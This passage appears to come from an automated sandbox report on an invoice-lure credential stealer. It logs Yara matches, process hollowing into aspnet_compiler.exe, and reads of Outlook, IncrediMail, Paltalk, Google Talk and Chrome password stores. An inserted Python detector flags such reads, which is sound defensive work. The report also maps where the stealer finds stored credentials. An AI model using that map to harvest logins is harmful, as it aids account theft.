Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\dwn.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Queries volume information: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Queries volume information: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_10002933 cpuid 12_2_10002933
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 12_2_10002264
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0041739B GetVersionExW, 14_2_0041739B

Stealing of Sensitive Information

Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR
Source: Yara match File source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match File source: Process Memory Space: aspnet_compiler.exe PID: 4884, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: Yara match File source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
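The registry keys and files listed in this section are the mail, browser and instant-messenger credential stores that the hollowed aspnet_compiler.exe reads. As an added example, not part of the Joe Sandbox report, the following Python turns that behaviour into a detection: it takes object-access style events (image, pid, target) and flags any process that reads these stores without being the application that owns them, scoring higher when the reader is a .NET Framework binary commonly used as a hollowing host or when one process sweeps several unrelated stores (the pattern of the bundled WebBrowserPassView-style tooling the report's Yara rules matched). The event schema, the owner image names, the hollowing-host list and the PIDs in the sample feed are assumptions of this example; the paths and keys are the ones the report lists.

```python
import re
from collections import defaultdict

# Credential stores the report shows aspnet_compiler.exe touching, each mapped to
# the image names assumed (for this example) to be their legitimate readers.
CREDENTIAL_STORES = {
    r"HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts": {"outlook.exe"},
    r"HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles": {"outlook.exe"},
    r"HKCU\Software\IncrediMail\Identities": {"incmail.exe"},
    r"HKCU\Software\Microsoft\Windows Live Mail": {"wlmail.exe"},
    r"HKCU\Software\Google\Google Talk\Accounts": {"googletalk.exe"},
    r"HKCU\Software\Microsoft\IdentityCRL\Dynamic Salt": {"msnmsgr.exe"},
    r"HKCU\Software\Paltalk": {"paltalk.exe"},
    r"\Google\Chrome\User Data\Default\Login Data": {"chrome.exe"},
    r"\Google\Chrome\User Data\Default\Web Data": {"chrome.exe"},
}

# .NET Framework binaries routinely used as process-hollowing hosts (the report
# shows aspnet_compiler.exe in that role); the list is an assumption of this example.
HOLLOWING_HOSTS = {"aspnet_compiler.exe", "regasm.exe", "regsvcs.exe",
                   "msbuild.exe", "installutil.exe"}

_HIVE_RE = re.compile(r"^(HKEY_CURRENT_USER|HKCU|HKU\\S-1-5-21-[\d-]+)\\", re.IGNORECASE)


def normalize_target(target: str) -> str:
    """Fold HKEY_CURRENT_USER, HKCU and HKU\\<user SID> onto 'HKCU\\' so one table
    serves sandbox output, object-access audit records and EDR telemetry alike."""
    return _HIVE_RE.sub(r"HKCU\\", target.strip())


def match_store(target: str):
    """Return (store, owners) when `target` is, or lies under, a known store."""
    t = normalize_target(target).lower()
    for store, owners in CREDENTIAL_STORES.items():
        s = store.lower()
        if s.startswith("hkcu\\"):
            if t == s or t.startswith(s + "\\"):
                return store, owners
        elif t.endswith(s):  # file stores are matched on their path suffix
            return store, owners
    return None


def detect(events):
    """Group credential-store accesses per process and score them.

    Each event is a dict with keys image, pid and target (registry key or file
    path). Returns one finding per offending process, highest severity first."""
    touched, image_of = defaultdict(set), {}
    for ev in events:
        hit = match_store(ev["target"])
        if hit is None:
            continue
        store, owners = hit
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if image in owners:
            continue  # the owning application reading its own data
        touched[ev["pid"]].add(store)
        image_of[ev["pid"]] = image
    findings = []
    for pid, stores in touched.items():
        image = image_of[pid]
        # Several unrelated stores read by one process is the sweep pattern of
        # bundled password-recovery tooling; a hollowing host as reader is worse still.
        severity = "high" if image in HOLLOWING_HOSTS or len(stores) >= 3 else "medium"
        findings.append({"pid": pid, "image": image,
                         "stores": sorted(stores), "severity": severity})
    findings.sort(key=lambda f: (f["severity"] != "high", -len(f["stores"]), f["pid"]))
    return findings


# Constructed sample feed: the accesses the report lists for aspnet_compiler.exe
# (PID chosen for the example), plus benign reads by owning applications and a
# single-key read by powershell.exe for contrast.
_HOST = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
SAMPLE_EVENTS = [{"image": _HOST, "pid": 3660, "target": t} for t in (
    r"HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles",
    r"HKEY_CURRENT_USER\Software\IncrediMail\Identities",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail",
    r"HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts",
    r"HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt",
    r"HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt",  # repeated, as in the report
    r"HKEY_CURRENT_USER\Software\Paltalk",
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data",
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
)] + [
    {"image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "pid": 1200,
     "target": r"HKU\S-1-5-21-1234567890-1-1001\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts"},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "pid": 2400,
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", "pid": 5100,
     "target": r"HKCU\Software\Microsoft\Windows Live Mail"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['severity']:6} pid={f['pid']} {f['image']} stores={len(f['stores'])}")
```

Run against the constructed feed, the aspnet_compiler.exe process comes out as a high-severity finding covering all nine stores, the Outlook and Chrome reads are ignored because the owning application made them, and the lone Windows Live Mail read by powershell.exe is reported at medium severity. The owner allow-list is the part to tune per estate; note that Sysmon does not log registry key opens, so a real feed needs registry object-access auditing (event 4663) or EDR telemetry.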

Remote Access Functionality

Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR
Source: Yara match File source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY